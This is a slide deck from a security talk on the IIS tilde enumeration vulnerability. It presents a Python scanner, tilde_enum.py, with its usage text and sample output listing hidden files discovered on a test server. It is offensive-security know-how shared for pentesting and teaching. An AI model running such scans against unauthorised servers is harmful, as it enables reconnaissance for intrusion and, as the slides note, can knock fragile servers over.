Date post: | 16-Jan-2015 |
Category: |
Technology |
Upload: | micah-hoffman |
View: | 3,024 times |
Download: | 7 times |
IIS TILDE ENUMERATION 1
IIS Tilde Enumeration (re)Exploited
Micah Hoffman @WebBreacher
2
Who am I?◦ Pentester◦ NoVA Hacker◦ PwnWiki.io curator / czar◦ Recon-ng module writer◦ SANS Mentor (SEC542)◦ Hiker / Backpacker
Micah Hoffman @WebBreacher IIS TILDE ENUMERATION
IIS TILDE ENUMERATION 3
Sometimes it is the little things…
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 4
Low Risk Web Vulnerabilities
Things not directly exploitable
Information Leakage◦ Directory Listings◦ Detailed Errors◦ Configuration Pages◦ IIS Tilde Enumeration
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 5
What is this vuln? IIS Tilde Enumeration Vulnerability
◦ Use HTTP response codes (400 or 404) to determine if a certain file/dir is on the system
http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 6
An example
Micah Hoffman @WebBreacher
When completed, 8.3 file names are revealed (ex., docume~1.htm)
From the original PDF report…
IIS TILDE ENUMERATION 7
Tilde Java POC Scanner Pros
◦ POC that there is a vuln◦ Free on Google Code◦ Fast
Cons◦ Java◦ Not recursive◦ Only gives 8.3 names◦ Can’t surf to 8.3 files =
Low Risk Vuln
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 8
How can I do it better? Make it in Python
Guess the file and dir names using wordlists◦ Get us real, full file and dir names
Recursivenessitivity◦ Go deep
Verbosity◦ Show me whatcha finding◦ Gimme response sizes (reduce False Positives)
Rate limiting for those ‘fragile’ systems
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 9
tilde_enum.py https://github.com/WebBreacher/tilde_enum
Micah Hoffman @WebBreacher
$ ./tilde_enum.py -husage: tilde_enum.py [-h] [-b] [-d DIRWORDLIST] [-f] [-u URL] [-v] wordlist
Exploits and expands the file names found from the tilde enumeration vuln
positional arguments: wordlist the wordlist file
optional arguments: -h, --help show this help message and exit -b brute force backup extension, extensions -d DIRWORDLIST an optional wordlist for directory name content -f force testing of the server even if the headers do not report it as an IIS system -u URL URL to scan -v verbose output
IIS TILDE ENUMERATION 10
tilde_enum.py Example
Micah Hoffman @WebBreacher
$ ./tilde_enum.py -u http://iis /pentest/fuzzdb/discovery/predictableres/raft-small-words-lowercase.txt[-] Testing with dummy file request http://iis/lJP7ROxEoS.htm[-] URLNotThere -> HTTP Code: 404, Response Length: 1635[-] Testing with user-submitted http://iis[-] URLUser -> HTTP Code: 200, Response Length: 1433[+] The server is reporting that it is IIS (Microsoft-IIS/6.0).[+] The server is vulnerable to the tilde enumeration vulnerability (IIS/5|6.x)..[+] Found a new directory: docume[+] Found a new directory: javasc[+] Found file: parame . xml[+] Found file: 765432 . htm[+] Found file: _vti_i . htm[+] Found a new directory: _vti_s[-] Finished doing the 8.3 enumeration for /.
IIS TILDE ENUMERATION 11
tilde_enum.py Example con’t
Micah Hoffman @WebBreacher
---------- FINAL OUTPUT ------------------------------[*] We found files for you to look at:[*] http://iis/_vti_inf.html - Size 1754[*] http://iis/documentation/advertising.html - Size 227[*] http://iis/documentation/default.aspx - Size 1433[*] http://iis/javascript/321.xlsx - Size 227[*] http://iis/parameter.xml - Size 1307
[*] Here are all the 8.3 names we found.[*] If any of these are 6 chars and look like they should work, try the file name with the first or second instead of all of them.[*] http://iis/documentation/advert~1.htm[*] http://iis/documentation/defaul~1.asp[*] http://iis/765432~1.htm[*] http://iis/_vti_i~1.htm[*] http://iis/parame~1.xml[*] http://iis/javascript/321~1.xls
IIS TILDE ENUMERATION 12
Shortcomings…for now Doesn’t find all the files
◦ < 3 char file names◦ ab.htm->abJHG7.htm
◦ Some other files are just missed◦ Odd file names (test.htm.bak,
Copy of micah.html)◦ Words not in the word list
Can DoS fragile servers Needs more ‘real-world’ testing No IIS7.x
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 13
Future Features Better file/dir detection
Peek into authentication-required dirs
Pull back file content and store locally
IIS7 support
Your suggestions
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 14
Conclusions Investigate the low risk vulns
Challenge yourself to enhance your tools◦ Don’t settle Create!
Share with the community
Micah Hoffman @WebBreacher
IIS TILDE ENUMERATION 15
Questionshttps://github.com/WebBreacher/tilde_enum
http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
Micah Hoffman@WebBreacher Novahackers.com
Micah Hoffman @WebBreacher